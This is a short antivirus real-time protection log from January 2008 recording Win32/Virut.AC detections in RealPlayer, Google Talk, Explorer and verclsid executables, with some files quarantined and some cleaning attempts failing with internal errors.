1/20/2008 4:41:13 PM Real-time file system protection file C:\Program Files\Real\RealPlayer\realplay.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 4:41:12 PM Real-time file system protection file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 4:41:12 PM Real-time file system protection file C:\WINDOWS\EXPLORER.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:41:11 PM Real-time file system protection file C:\WINDOWS\system32\verclsid.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:41:11 PM Real-time file system protection file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.